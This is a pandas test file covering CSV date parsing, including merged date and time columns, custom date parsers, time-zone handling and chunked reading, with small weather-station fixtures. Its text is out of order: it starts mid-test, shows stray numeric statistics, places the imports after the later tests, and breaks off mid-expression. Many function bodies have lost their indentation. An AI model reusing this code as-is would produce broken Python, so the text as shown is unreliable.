         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "ActualTime", "TDew",
                "TAir", "Windspeed", "Precip", "WindDir"])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,parse_dates,msg", [
("""\
date_NominalTime,date,NominalTime
KORD1,19990127, 19:00:00
KORD2,19990127, 20:00:00""", [[1, 2]], ("New date column already "
"in dict date_NominalTime")),
("""\
ID,date,nominalTime
KORD,19990127, 19:00:00
KORD,19990127, 20:00:00""", dict(ID=[1, 2]), "Date column ID already in dict")
])
def test_multiple_date_col_name_collision(all_parsers, data, parse_dates, msg):
parser = all_parsers
with pytest.raises(ValueError, match=msg):
parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_date_parser_int_bug(all_parsers):
    # see gh-3071
    """A ``date_parser`` applied to an integer column (a POSIX timestamp)
    must receive the raw values and not crash (gh-3071)."""
    parser = all_parsers
    data = ("posix_timestamp,elapsed,sys,user,queries,query_time,rows,"
            "accountid,userid,contactid,level,silo,method\n"
            "1343103150,0.062353,0,4,6,0.01690,3,"
            "12345,1,-1,3,invoice_InvoiceResource,search\n")
    result = parser.read_csv(
        StringIO(data), index_col=0, parse_dates=[0],
        date_parser=lambda x: datetime.utcfromtimestamp(int(x)))
    expected = DataFrame([[0.062353, 0, 4, 6, 0.01690, 3, 12345, 1, -1,
                           3, "invoice_InvoiceResource", "search"]],
                         columns=["elapsed", "sys", "user", "queries",
                                  "query_time", "rows", "accountid",
                                  "userid", "contactid", "level",
                                  "silo", "method"],
                         index=Index([Timestamp("2012-07-24 04:12:30")],
                                     name="posix_timestamp"))
    tm.assert_frame_equal(result, expected)
def test_nat_parse(all_parsers):
    """NaN/NaT values must survive a to_csv/read_csv round trip in both
    float and datetime columns (gh-3062)."""
    parser = all_parsers
    frame = DataFrame({"A": np.arange(10, dtype="float64"),
                       "B": pd.Timestamp("20010101")})
    frame.iloc[3:6, :] = np.nan
    with tm.ensure_clean("__nat_parse_.csv") as path:
        frame.to_csv(path)
        roundtripped = parser.read_csv(path, index_col=0, parse_dates=["B"])
        tm.assert_frame_equal(roundtripped, frame)
def test_csv_custom_parser(all_parsers):
    """A custom ``date_parser`` must match the built-in parsing of an
    implicit date index."""
    data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
    parser = all_parsers
    expected = parser.read_csv(StringIO(data), parse_dates=True)

    def custom_parser(value):
        # Same format the default parser infers for these rows.
        return datetime.strptime(value, "%Y%m%d")

    result = parser.read_csv(StringIO(data), date_parser=custom_parser)
    tm.assert_frame_equal(result, expected)
def test_parse_dates_implicit_first_col(all_parsers):
data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=True)
expected = parser.read_csv(StringIO(data), index_col=0,
parse_dates=True)
tm.assert_frame_equal(result, expected)
def test_parse_dates_string(all_parsers):
data = """date,A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), index_col="date",
parse_dates=["date"])
index = date_range("1/1/2009", periods=3)
index.name = "date"
expected = DataFrame({"A": ["a", "b", "c"], "B": [1, 3, 4],
"C": [2, 4, 5]}, index=index)
tm.assert_frame_equal(result, expected)
# Bug in https://github.com/dateutil/dateutil/issues/217
# has been addressed, but we just don't pass in the `yearfirst`
@pytest.mark.xfail(reason="yearfirst is not surfaced in read_*")
@pytest.mark.parametrize("parse_dates", [
    [["date", "time"]],
    [[0, 1]]
])
def test_yy_format_with_year_first(all_parsers, parse_dates):
    """Two-digit years ("09...") should parse year-first once ``yearfirst``
    is surfaced through read_csv (currently xfail)."""
    data = """date,time,B,C
090131,0010,1,2
090228,1020,3,4
090331,0830,5,6
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), index_col=0,
                             parse_dates=parse_dates)
    index = DatetimeIndex([datetime(2009, 1, 31, 0, 10, 0),
                           datetime(2009, 2, 28, 10, 20, 0),
                           datetime(2009, 3, 31, 8, 30, 0)],
                          dtype=object, name="date_time")
    expected = DataFrame({"B": [1, 3, 5], "C": [2, 4, 6]}, index=index)
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("parse_dates", [[0, 2], ["a", "c"]])
def test_parse_dates_column_list(all_parsers, parse_dates):
data = "a,b,c\n01/01/2010,1,15/02/2010"
parser = all_parsers
expected = DataFrame({"a": [datetime(2010, 1, 1)], "b": [1],
"c": [datetime(2010, 2, 15)]})
expected = expected.set_index(["a", "b"])
result = parser.read_csv(StringIO(data), index_col=[0, 1],
parse_dates=parse_dates, dayfirst=True)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_parse_dates(all_parsers, index_col):
    """``parse_dates=True`` parses the datetime level of a MultiIndex, in
    either index-column order."""
    data = """index1,index2,A,B,C
20090101,one,a,1,2
20090101,two,b,3,4
20090101,three,c,4,5
20090102,one,a,1,2
20090102,two,b,3,4
20090102,three,c,4,5
20090103,one,a,1,2
20090103,two,b,3,4
20090103,three,c,4,5
"""
    parser = all_parsers
    index = MultiIndex.from_product([
        (datetime(2009, 1, 1), datetime(2009, 1, 2),
         datetime(2009, 1, 3)), ("one", "two", "three")],
        names=["index1", "index2"])
    # Out of order.
    if index_col == [1, 0]:
        index = index.swaplevel(0, 1)
    expected = DataFrame([["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
                          ["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
                          ["a", 1, 2], ["b", 3, 4], ["c", 4, 5]],
                         columns=["A", "B", "C"], index=index)
    result = parser.read_csv(StringIO(data), index_col=index_col,
                             parse_dates=True)
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [
    dict(dayfirst=True), dict(day_first=True)
])
def test_parse_dates_custom_euro_format(all_parsers, kwargs):
    """A day-first custom parser works via ``dayfirst``; the misspelled
    ``day_first`` keyword must propagate as a TypeError from the parser."""
    parser = all_parsers
    data = """foo,bar,baz
31/01/2010,1,2
01/02/2010,1,NA
02/02/2010,1,2
"""
    # Valid keyword: dates parse day-first and NA is honored.
    if "dayfirst" in kwargs:
        df = parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
                             date_parser=lambda d: parse_date(d, **kwargs),
                             header=0, index_col=0, parse_dates=True,
                             na_values=["NA"])
        exp_index = Index([datetime(2010, 1, 31), datetime(2010, 2, 1),
                           datetime(2010, 2, 2)], name="time")
        expected = DataFrame({"Q": [1, 1, 1], "NTU": [2, np.nan, 2]},
                             index=exp_index, columns=["Q", "NTU"])
        tm.assert_frame_equal(df, expected)
    # Invalid keyword: the lambda raises when calling parse_date.
    else:
        msg = "got an unexpected keyword argument 'day_first'"
        with pytest.raises(TypeError, match=msg):
            parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
                            date_parser=lambda d: parse_date(d, **kwargs),
                            skiprows=[0], index_col=0, parse_dates=True,
                            na_values=["NA"])
def test_parse_tz_aware(all_parsers):
    """ISO8601 values with a "Z" suffix should yield a UTC-aware index
    (gh-1693)."""
    data = "Date,x\n2012-06-13T01:39:00Z,0.5"
    result = all_parsers.read_csv(StringIO(data), index_col=0,
                                  parse_dates=True)
    expected_index = Index([Timestamp("2012-06-13 01:39:00+00:00")],
                           name="Date")
    expected = DataFrame({"x": [0.5]}, index=expected_index)
    tm.assert_frame_equal(result, expected)
    assert result.index.tz is pytz.utc
@pytest.mark.parametrize("parse_dates,index_col", [
    ({"nominal": [1, 2]}, "nominal"),
    ({"nominal": [1, 2]}, 0),
    ([[1, 2]], 0),
])
def test_multiple_date_cols_index(all_parsers, parse_dates, index_col):
    """A merged date column can be selected as index by name or position,
    whether ``parse_dates`` is given as a dict or as nested lists."""
    parser = all_parsers
    data = """
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD1,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD2,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD3,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD4,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD5,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD6,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD1", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD2", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD3", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD4", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD5", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD6", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "ActualTime", "TDew",
                "TAir", "Windspeed", "Precip", "WindDir"])
    expected = expected.set_index("nominal")
    if not isinstance(parse_dates, dict):
        # List-style parse_dates auto-generates the joined column name.
        expected.index.name = "date_NominalTime"
    result = parser.read_csv(StringIO(data), parse_dates=parse_dates,
                             index_col=index_col)
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_chunked(all_parsers):
    """Merged date columns and a date index work identically when reading
    in chunks via ``chunksize``."""
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "actualTime", "A", "B", "C", "D", "E"])
    expected = expected.set_index("nominal")
    reader = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]},
                             index_col="nominal", chunksize=2)
    chunks = list(reader)
    # Three chunks of two rows each, matching slices of the full frame.
    tm.assert_frame_equal(chunks[0], expected[:2])
    tm.assert_frame_equal(chunks[1], expected[2:4])
    tm.assert_frame_equal(chunks[2], expected[4:])
def test_multiple_date_col_named_index_compat(all_parsers):
    """Merging date columns by position must agree with merging the same
    columns by name."""
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    by_names = parser.read_csv(StringIO(data), index_col="nominal",
                               parse_dates={"nominal": [
                                   "date", "nominalTime"]})
    by_indices = parser.read_csv(StringIO(data),
                                 parse_dates={"nominal": [1, 2]},
                                 index_col="nominal")
    tm.assert_frame_equal(by_indices, by_names)
def test_multiple_date_col_multiple_index_compat(all_parsers):
    """Selecting [merged-date, ID] as index_col must match reading flat and
    calling set_index afterwards."""
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    expected = parser.read_csv(
        StringIO(data),
        parse_dates={"nominal": [1, 2]}).set_index(["nominal", "ID"])
    result = parser.read_csv(StringIO(data), index_col=["nominal", "ID"],
                             parse_dates={"nominal": [1, 2]})
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [dict(), dict(index_col="C")])
def test_read_with_parse_dates_scalar_non_bool(all_parsers, kwargs):
# see gh-5636
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates="C", **kwargs)
@pytest.mark.parametrize("parse_dates", [
(1,), np.array([4, 5]), {1, 3, 3}
])
def test_read_with_parse_dates_invalid_type(all_parsers, parse_dates):
parser = all_parsers
msg = ("Only booleans, lists, and dictionaries "
"are accepted for the 'parse_dates' parameter")
data = """A,B,C
1,2,2003-11-1"""
with pytest.raises(TypeError, match=msg):
parser.read_csv(StringIO(data), parse_dates=(1,))
def test_parse_dates_empty_string(all_parsers):
# see gh-2263
parser = all_parsers
data = "Date,test\n2012-01-01,1\n,2"
result = parser.read_csv(StringIO(data), parse_dates=["Date"],
na_filter=False)
expected = DataFrame([[datetime(2012, 1, 1), 1], [pd.NaT, 2]],
columns=["Date", "test"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
("a\n04.15.2016", dict(parse_dates=["a"]),
DataFrame([datetime(2016, 4, 15)], columns=["a"])),
("a\n04.15.2016", dict(parse_dates=True, index_col=0),
DataFrame(index=DatetimeIndex(["2016-04-15"], name="a"))),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=["a", "b"]),
DataFrame([[datetime(2016, 4, 15), datetime(2013, 9, 16)]],
columns=["a", "b"])),
("a,b\n04.15.2016,09.16.2013", dict(parse_dates=True, index_col=[0, 1]),
DataFrame(index=MultiIndex.from_tuples(
[(datetime(2016, 4, 15), datetime(2013, 9, 16))], names=["a", "b"]))),
])
def test_parse_dates_no_convert_thousands(all_parsers, data, kwargs, expected):
# see gh-14066
parser = all_parsers
result = parser.read_csv(StringIO(data), thousands=".", **kwargs)
tm.assert_frame_equal(result, expected)
def test_parse_date_time_multi_level_column_name(all_parsers):
    """Merging date columns under a two-row (MultiIndex) header collapses
    the merged column to a plain "date_time" name."""
    data = """\
D,T,A,B
date, time,a,b
2001-01-05, 09:00:00, 0.0, 10.
2001-01-06, 00:00:00, 1.0, 11.
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=[0, 1],
                             parse_dates={"date_time": [0, 1]},
                             date_parser=conv.parse_date_time)
    expected_data = [[datetime(2001, 1, 5, 9, 0, 0), 0., 10.],
                     [datetime(2001, 1, 6, 0, 0, 0), 1., 11.]]
    expected = DataFrame(expected_data,
                         columns=["date_time", ("A", "a"), ("B", "b")])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
    ("""\
date,time,a,b
2001-01-05, 10:00:00, 0.0, 10.
2001-01-05, 00:00:00, 1., 11.
""", dict(header=0, parse_dates={"date_time": [0, 1]}),
     DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10],
                [datetime(2001, 1, 5, 0, 0, 0), 1.0, 11.0]],
               columns=["date_time", "a", "b"])),
    (("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
      "KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
      "KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
      "KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
      "KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
      "KORD,19990127, 23:00:00, 22:56:00, -0.5900"),
     dict(header=None, parse_dates={"actual": [1, 2], "nominal": [1, 3]}),
     DataFrame([
         [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
          "KORD", 0.81],
         [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
          "KORD", 0.01],
         [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
          "KORD", -0.59],
         [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
          "KORD", -0.99],
         [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
          "KORD", -0.59],
         [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
          "KORD", -0.59]], columns=["actual", "nominal", 0, 4])),
])
def test_parse_date_time(all_parsers, data, kwargs, expected):
    """``conv.parse_date_time`` merges separate date and time columns, with
    or without a header row."""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), date_parser=conv.parse_date_time,
                             **kwargs)
    # Python can sometimes be flaky about how
    # the aggregated columns are entered, so
    # this standardizes the order.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
def test_parse_date_fields(all_parsers):
    """Separate year/month/day columns merge into one date column via
    ``conv.parse_date_fields``."""
    parser = all_parsers
    data = ("year,month,day,a\n2001,01,10,10.\n"
            "2001,02,1,11.")
    expected = DataFrame([[datetime(2001, 1, 10), 10.],
                          [datetime(2001, 2, 1), 11.]], columns=["ymd", "a"])
    parsed = parser.read_csv(StringIO(data), header=0,
                             parse_dates={"ymd": [0, 1, 2]},
                             date_parser=conv.parse_date_fields)
    tm.assert_frame_equal(parsed, expected)
def test_parse_date_all_fields(all_parsers):
    """Year through second columns merge into one datetime column via
    ``conv.parse_all_fields``."""
    parser = all_parsers
    data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0,0.0,10.
2001,01,5,10,0,00,1.,11.
"""
    result = parser.read_csv(StringIO(data), header=0,
                             date_parser=conv.parse_all_fields,
                             parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
    expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10.0],
                          [datetime(2001, 1, 5, 10, 0, 0), 1.0, 11.0]],
                         columns=["ymdHMS", "a", "b"])
    tm.assert_frame_equal(result, expected)
def test_datetime_fractional_seconds(all_parsers):
    """Fractional seconds in the seconds column survive the field merge as
    microseconds."""
    parser = all_parsers
    data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0.123456,0.0,10.
2001,01,5,10,0,0.500000,1.,11.
"""
    result = parser.read_csv(StringIO(data), header=0,
                             date_parser=conv.parse_all_fields,
                             parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
    expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0,
                                    microsecond=123456), 0.0, 10.0],
                          [datetime(2001, 1, 5, 10, 0, 0,
                                    microsecond=500000), 1.0, 11.0]],
                         columns=["ymdHMS", "a", "b"])
    tm.assert_frame_equal(result, expected)
def test_generic(all_parsers):
    """An arbitrary callable may combine columns into any date-like value
    (here a ``datetime.date`` pinned to the first of the month)."""
    parser = all_parsers
    data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."

    def first_of_month(y, m):
        # Equivalent to the original lambda: day is always fixed to 1.
        return date(year=int(y), month=int(m), day=1)

    result = parser.read_csv(StringIO(data), header=0,
                             parse_dates={"ym": [0, 1]},
                             date_parser=first_of_month)
    expected = DataFrame([[date(2001, 1, 1), 10, 10.],
                          [date(2001, 2, 1), 1, 11.]],
                         columns=["ym", "day", "a"])
    tm.assert_frame_equal(result, expected)
def test_date_parser_resolution_if_not_ns(all_parsers):
    """A ``date_parser`` returning non-nanosecond datetime64 values
    (here second resolution) must be preserved in the index (gh-10245)."""
    parser = all_parsers
    data = """\
date,time,prn,rxstatus
2013-11-03,19:00:00,126,00E80000
2013-11-03,19:00:00,23,00E80000
2013-11-03,19:00:00,13,00E80000
"""
    def date_parser(dt, time):
        """Join date and time strings into datetime64[s] values."""
        return np_array_datetime64_compat(dt + "T" + time + "Z",
                                          dtype="datetime64[s]")
    result = parser.read_csv(StringIO(data), date_parser=date_parser,
                             parse_dates={"datetime": ["date", "time"]},
                             index_col=["datetime", "prn"])
    datetimes = np_array_datetime64_compat(["2013-11-03T19:00:00Z"] * 3,
                                           dtype="datetime64[s]")
    expected = DataFrame(data={"rxstatus": ["00E80000"] * 3},
                         index=MultiIndex.from_tuples(
                             [(datetimes[0], 126), (datetimes[1], 23),
                              (datetimes[2], 13)], names=["datetime", "prn"]))
    tm.assert_frame_equal(result, expected)
def test_parse_date_column_with_empty_string(all_parsers):
# see gh-6428
parser = all_parsers
data = "case,opdate\n7,10/18/2006\n7,10/18/2008\n621, "
result = parser.read_csv(StringIO(data), parse_dates=["opdate"])
expected_data = [[7, "10/18/2006"],
[7, "10/18/2008"],
[621, " "]]
expected = DataFrame(expected_data, columns=["case", "opdate"])
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,expected", [
("a\n135217135789158401\n1352171357E+5",
DataFrame({"a": [135217135789158401,
135217135700000]}, dtype="float64")),
("a\n99999999999\n123456789012345\n1234E+0",
DataFrame({"a": [99999999999,
123456789012345,
1234]}, dtype="float64"))
])
@pytest.mark.parametrize("parse_dates", [True, False])
def test_parse_date_float(all_parsers, data, expected, parse_dates):
# see gh-2697
#
# Date parsing should fail, so we leave the data untouched
# (i.e. float precision should remain unchanged).
parser = all_parsers
result = parser.read_csv(StringIO(data), parse_dates=parse_dates)
tm.assert_frame_equal(result, expected)
def test_parse_timezone(all_parsers):
    """Fixed-offset timestamps ("+09:00") parse into a tz-aware column
    (gh-22256)."""
    # see gh-22256
    parser = all_parsers
    data = """dt,val
2018-01-04 09:01:00+09:00,23350
2018-01-04 09:02:00+09:00,23400
2018-01-04 09:03:00+09:00,23400
2018-01-04 09:04:00+09:00,23400
2018-01-04 09:05:00+09:00,23400"""
    result = parser.read_csv(StringIO(data), parse_dates=["dt"])
    # +09:00 corresponds to a pytz.FixedOffset of 540 minutes.
    dti = pd.date_range(start="2018-01-04 09:01:00",
                        end="2018-01-04 09:05:00", freq="1min",
                        tz=pytz.FixedOffset(540))
    expected_data = {"dt": dti, "val": [23350, 23400, 23400, 23400, 23400]}
    expected = DataFrame(expected_data)
    tm.assert_frame_equal(result, expected)
| 40.189189
| 79
| 0.570597
|
from datetime import date, datetime
from io import StringIO
import numpy as np
import pytest
import pytz
from pandas._libs.tslib import Timestamp
from pandas._libs.tslibs import parsing
from pandas.compat import lrange, parse_date
from pandas.compat.numpy import np_array_datetime64_compat
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, MultiIndex
from pandas.core.indexes.datetimes import date_range
import pandas.util.testing as tm
import pandas.io.date_converters as conv
import pandas.io.parsers as parsers
def test_separator_date_conflict(all_parsers):
    """A ``thousands`` separator that also appears inside date strings must
    not interfere with date parsing of the merged columns."""
    data = "06-02-2013;13:00;1-000.215"
    result = all_parsers.read_csv(StringIO(data), sep=";", thousands="-",
                                  parse_dates={"Date": [0, 1]}, header=None)
    expected = DataFrame([[datetime(2013, 6, 2, 13, 0, 0), 1000.215]],
                         columns=["Date", 2])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col_custom(all_parsers, keep_date_col):
    """A custom ``date_parser`` combined with a ``parse_dates`` dict builds
    the named "actual"/"nominal" datetime columns; ``keep_date_col``
    controls retention of the raw source columns."""
    data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    parser = all_parsers
    def date_parser(*date_cols):
        """Concatenate the given column arrays and parse them as dates."""
        return parsing.try_parse_dates(parsers._concat_date_cols(date_cols))
    result = parser.read_csv(StringIO(data), header=None,
                             date_parser=date_parser, prefix="X",
                             parse_dates={"actual": [1, 2],
                                          "nominal": [1, 3]},
                             keep_date_col=keep_date_col)
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", "19990127", " 19:00:00", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", "19990127", " 20:00:00", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", "19990127", " 21:00:00", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", "19990127", " 21:00:00", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", "19990127", " 22:00:00", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", "19990127", " 23:00:00", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["actual", "nominal", "X0", "X1", "X2",
                "X3", "X4", "X5", "X6", "X7", "X8"])
    if not keep_date_col:
        # Source columns X1-X3 are consumed by the merge and dropped.
        expected = expected.drop(["X1", "X2", "X3"], axis=1)
    elif parser.engine == "python":
        # The Python engine keeps the raw date column as int64, not str.
        expected["X1"] = expected["X1"].astype(np.int64)
    # The aggregated column order can vary, so standardize it.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col(all_parsers, keep_date_col):
    """Nested lists in ``parse_dates`` merge the named columns into new
    "X1_X2"-style datetime columns; ``keep_date_col`` controls whether the
    raw source columns are retained."""
    data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None,
                             prefix="X", parse_dates=[[1, 2], [1, 3]],
                             keep_date_col=keep_date_col)
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", "19990127", " 19:00:00", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", "19990127", " 20:00:00", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", "19990127", " 21:00:00", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", "19990127", " 21:00:00", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", "19990127", " 22:00:00", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", "19990127", " 23:00:00", " 22:56:00",
